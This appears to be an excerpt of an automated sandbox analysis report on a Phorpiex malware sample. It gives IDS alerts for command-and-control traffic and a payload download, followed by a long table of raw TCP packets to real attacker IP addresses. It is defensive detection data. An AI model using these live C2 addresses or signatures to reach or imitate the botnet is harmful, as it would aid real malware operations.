                                                                                                                                  2024-10-28T11:11:13.063265+01002022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M21185.215.113.6680192.168.2.449730TCP
                                                                                                                                  2024-10-28T11:11:21.513089+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731185.215.113.6680TCP
                                                                                                                                  2024-10-28T11:11:21.513089+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449731185.215.113.6680TCP
                                                                                                                                  2024-10-28T11:11:23.515407+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449734185.215.113.6680TCP
                                                                                                                                  2024-10-28T11:11:23.515407+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449734185.215.113.6680TCP
                                                                                                                                  2024-10-28T11:11:23.546010+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.4503455.239.153.19240500UDP
                                                                                                                                  2024-10-28T11:11:23.823677+01002837677ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature)1185.215.113.6680192.168.2.449734TCP
                                                                                                                                  2024-10-28T11:11:26.495491+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44974091.202.233.14180TCP
                                                                                                                                  2024-10-28T11:11:28.559672+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.4503455.75.95.11440500UDP
                                                                                                                                  2024-10-28T11:11:29.339713+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.457562185.215.113.6680TCP
                                                                                                                                  2024-10-28T11:11:29.339713+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.457562185.215.113.6680TCP
                                                                                                                                  2024-10-28T11:11:31.283957+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.457563185.215.113.6680TCP
                                                                                                                                  2024-10-28T11:11:31.283957+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.457563185.215.113.6680TCP

                                                                                                                                  Network Port Distribution

                                                                                                                                  TCP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Oct 28, 2024 11:11:11.839337111 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:11.845125914 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:11.845236063 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:11.845627069 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:11.851102114 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.754463911 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.754487038 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.754501104 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.754512072 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.754523993 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.754535913 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.754548073 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.754560947 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.754559994 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:12.754575968 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.754601002 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:12.754637003 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:12.755492926 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.755538940 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:12.759903908 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.759974957 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:12.760143995 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.760155916 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.760195971 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:12.760216951 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:12.908929110 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.909109116 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:12.909112930 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.909125090 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.909137011 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.909174919 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:12.909199953 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:12.914392948 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.914397955 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.914402962 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.914407969 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.914446115 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:12.914473057 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:12.919675112 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.919687986 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.919698954 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.919712067 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.919723988 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.919728041 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:12.919780016 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:12.924921989 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.924932957 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.924937963 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.924943924 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.925019026 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:12.930206060 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.930217028 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.930222034 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.930227041 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.930375099 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:12.935571909 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.935589075 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:12.935646057 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.062932014 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.062946081 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.062952995 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.063096046 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.063265085 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.063277006 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.063287020 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.063309908 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.063333035 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.063499928 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.063515902 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.063529015 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.063539982 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.063544989 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.063550949 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.063566923 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.063592911 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.064307928 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.064332962 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.064347029 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.064359903 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.064369917 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.064399004 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.064898014 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.064909935 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.064922094 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.064945936 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.064969063 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.064996958 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.065009117 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.065037012 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.065054893 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.065808058 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.065819979 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.065829039 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.065856934 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.065857887 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.065870047 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.065886974 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.065912962 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.066576958 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.066622019 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.066627026 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.066637993 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.066664934 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.066673040 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.066679001 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.066685915 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.066709042 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.066726923 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.067468882 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.067481041 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.067496061 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.067513943 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.067522049 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.067534924 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.067543983 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.067567110 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.068380117 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.068391085 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.068401098 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.068422079 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.068423033 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.068437099 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.068444014 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.068466902 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.068481922 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.330130100 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:20.598890066 CET4973180192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:20.604953051 CET8049731185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:20.605799913 CET4973180192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:20.606060028 CET4973180192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:20.611977100 CET8049731185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:21.512868881 CET8049731185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:21.512989998 CET8049731185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:21.513026953 CET8049731185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:21.513062000 CET8049731185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:21.513088942 CET4973180192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:21.513096094 CET8049731185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:21.513134003 CET8049731185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:21.513163090 CET4973180192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:21.513163090 CET4973180192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:21.513168097 CET8049731185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:21.513197899 CET4973180192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:21.513204098 CET8049731185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:21.513221979 CET4973180192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:21.513237953 CET8049731185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:21.513276100 CET8049731185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:21.513312101 CET4973180192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:21.513335943 CET4973180192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:21.518661022 CET8049731185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:21.518696070 CET8049731185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:21.518762112 CET4973180192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:21.593621016 CET4973180192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:21.593739033 CET4973180192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:22.605431080 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:22.611645937 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:22.611841917 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:22.612062931 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:22.618061066 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.515336037 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.515369892 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.515388966 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.515407085 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.515410900 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.515428066 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.515435934 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.515445948 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.515465021 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.515475035 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.515484095 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.515499115 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.515501022 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.515521049 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.515526056 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.515557051 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.520992041 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.521060944 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.540958881 CET4973540500192.168.2.42.186.114.89
                                                                                                                                  Oct 28, 2024 11:11:23.546436071 CET40500497352.186.114.89192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.547032118 CET4973540500192.168.2.42.186.114.89
                                                                                                                                  Oct 28, 2024 11:11:23.550004005 CET4973540500192.168.2.42.186.114.89
                                                                                                                                  Oct 28, 2024 11:11:23.555526972 CET40500497352.186.114.89192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.555895090 CET4973540500192.168.2.42.186.114.89
                                                                                                                                  Oct 28, 2024 11:11:23.561331034 CET40500497352.186.114.89192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.669003010 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.669020891 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.669039965 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.669099092 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.669102907 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.669121981 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.669161081 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.669325113 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.669341087 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.669357061 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.669368982 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.669446945 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.669723034 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.669778109 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.669801950 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.669817924 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.669832945 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.669864893 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.669895887 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.670398951 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.670454025 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.670473099 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.670489073 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.670504093 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.670533895 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.670567989 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.671211958 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.671262980 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.671267033 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.671287060 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.671303988 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.671328068 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.671366930 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.671989918 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.672046900 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.672374010 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.672627926 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.674803972 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.674839020 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.674855947 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.674870014 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.674882889 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.674909115 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.674909115 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.674922943 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.674952030 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.674972057 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.823560953 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.823643923 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.823645115 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.823677063 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.823730946 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.823734045 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.823772907 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.823807001 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.823818922 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.823843956 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.823852062 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.823888063 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.823955059 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.823992014 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.824026108 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.824038029 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.824124098 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.824171066 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.824177027 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.824209929 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.824219942 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.824440956 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.824490070 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.824495077 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.824532032 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.824542999 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.824575901 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.824584961 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.824619055 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.824630022 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.824654102 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.824671984 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.824700117 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.824948072 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.824995041 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.825001955 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.825046062 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.825052977 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.825097084 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.825105906 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.825139046 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.825155020 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.825175047 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.825181961 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.825210094 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.825221062 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.825246096 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.825253963 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.825282097 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.825290918 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.825877905 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.825927019 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.825937986 CET8049734185.215.113.66192.168.2.4
